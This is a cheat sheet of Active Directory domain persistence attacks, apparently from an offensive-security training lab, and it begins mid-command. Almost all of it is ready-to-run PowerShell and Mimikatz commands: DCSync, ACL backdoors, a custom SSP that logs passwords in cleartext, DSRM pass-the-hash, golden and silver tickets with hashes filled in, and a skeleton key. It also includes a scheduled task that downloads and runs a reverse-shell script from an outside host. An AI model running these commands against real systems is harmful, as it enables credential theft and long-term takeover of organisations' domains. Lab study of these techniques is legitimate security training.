"Password@123" -AsPlainText -Force) -Verbose ::: USING AD MODULE PS> Set-ADAccountPassword -Identity testda -NewPassword(ConvertTo-SecureString "Password@123" -AsPlainText -Force) -VerboseDOMAIN PERSISTENCE ACL RIGHTS ABUSE
DESCRIPTION: With DA privileges, the ACL for the domain root can be modified to provide useful rights like FullControl or the ability to run "DCSync". ::: ADD FULL CONTROL RIGHTS PS> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -RightsAll -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose ::: USING ACTIVEDIRECTORYMODULE AND RACE PS> Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose ::: ADD RIGHTS FOR DCSync PS> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose ::: USING ACTIVEDIRECTORYMODULE AND RACE PS> Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose ::: EXECUTE DCSync PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' or PS> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"DOMAIN PERSISTENCE ACL SECURITY DESCRIPTORS
DESCRIPTION: >> Security Descriptor Definition Language defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid >> ACE for built-in administrators for WMI namespaces A;CI;CCDCLCSWRPWPRCWD;;;SID ::: USING WMI Using the RACE toolkit IMPORT THE MODULE . C:\AD\Tools\RACE-master\RACE.ps1 ON LOCAL MACHINE FOR student1 PS> Set-RemoteWMI -SamAccountName student1 -Verbose ON REMOTE MACHINE FOR student1 WITHOUT EXPLICIT CREDENTIALS PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose ON REMOTE MACHINE WITH EXPLICIT CREDENTIALS. ONLY root\cimv2 AND NESTED NAMESPACES PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator –namespace 'root\cimv2' -Verbose ON REMOTE MACHINE REMOVE PERMISSIONS PS> Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Remove -Verbose ::: USING POWERSHELL REMOTING ON LOCAL MACHINE FOR student1 PS> Set-RemotePSRemoting -SamAccountName student1 -Verbose ON REMOTE MACHINE FOR student1 WITHOUT CREDENTIALS PS> Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose ON REMOTE MACHINE, REMOVE THE PERMISSIONS PS> Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove ::: USING REMOTE REGISTRY USING RACE or DAMP, WITH ADMIN PRIVSON REMOTE MACHINE PS> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose AS student1, RETRIEVE MACHINE ACCOUNT HASH PS> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose RETRIEVE LOCAL ACCOUNT HASH PS> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose RETRIEVE DOMAIN CACHED CREDENTIALS PS> Get-RemoteCachedCredential -ComputerName dcorp-dc -VerbosePOWERSHELL PERSISTENCE
DOMAIN PERSISTENCE CUSTOMSSP
DESCRIPTION: "is a DLL which provides ways for an application to obtain an authenticated connection" Sample: NTLM | Kerberos | Wdigest | CredSSP Mimikatz provides a custom SSP -mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server. >> Two ways: ::: .DLL Process: drop the mimilib.dll to system32 and add mimilib to "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security" PS> $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages' PS> $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value PS> $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages ::: INJECT INTO LSASS USING MIMIKATZ PS> Invoke-Mimikatz -Command '"misc::memssp"' NOTE: local logons are logged on the following file C:\Windows\system32\kiwissp.logDOMAIN PERSISTENCE DSMR
DESCRIPTION: "Directory Services Restore Mode" - There is a local administrator on every DC called "Administrator" whose password is the DSRM password. - After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC. ::: DUMP DSRM PASSWORD (needs DA privs) PS> Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc ::: COMPARE THE "ADMINISTRATOR" HASH WITH THE ADMINISTRATOR HASH OF BELOW COMMAND PS> Invoke-Mimikatz -Command '"lsadump::lsa/patch"' -Computername dcorp-dc Page 148 Since it is the local administrator of the DC, we can pass the hash to authenticate. But, the Logon Behavior for the DSRM account needs to be changed before we can use its hash. PS> Enter-PSSession -Computername dcorp-dc New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD ::: PASS THE HASH PS> Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' PS> ls \\dcorp-dc\C$DOMAIN PERSISTENCE GOLDEN
DESCRIPTION: ::: GET KRBTGT HASH - Execute mimikatz on DC as DA to get krbtgt hash PS> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dc - On any machine PS> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' Page 130... ::: USING DSYNC To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges (or a user that has replication rights on the domain object) PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'DOMAIN PERSISTENCE SILVER
DESCRIPTION: A valid TGS (Golden ticket is TGT). Encrypted and signed by the hash of the service account (golden ticket is signed by hash of krbtgt) of the service running with that account. Services rarely check PAC (Privileged Attribute Certificate). Services will allow access only to the services themselves. Reasonable persistence period (default 30 days for computer accounts). ::: USING HASH OF THE DOMAIN CONTROLLER COMPUTER ACCOUNT, BELOW COMMAND PROVIDES ACCESS TO SHARES ON THE DC. PS> Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"' NOTE: this same command can be applied for more services, (HTTP, HOST & more) ::: CREATE A SILVER TICKET FOR THE HOST SPN WHICH WILL ALLOW US TO SCHEDULE A TASK ON THE TARGET PS> Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"' ::: SCHEDULE AND EXECUTE A TASK PS> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'" PS> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"DOMAIN PERSISTENCE SKELETON KEY
DESCRIPTION: Skeleton key is a persistence technique where it is possible to patch a Domain Controller (lsassprocess) so that it allows access as any user with a single password. ::: INJECT A SKELETON KEY (password would be mimikatz) ON A DOMAIN CONTROLLER OF CHOICE. (DA privileges required) PS> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local Now, it is possible to access any machine with a valid username and password as "mimikatz"... PS> Enter-PSSession –Computername dcorp-dc –credential dcorp\AdministratorPOWERSHELL CONNECTION
REMOTE CONNECTION
DESCRIPTION: :::CONNECT TO A REMOTE MACHINE USING WINRS PS> winrs -r:[hostname] [command] PS> winrs -r:CVS-SRV001 cmd :::CONNECT TO A REMOTE MACHINE USING POWERSHELL-REMOTING PS> Enter-PSSession -ComputerName [FQDN]
©® - 2023/2024.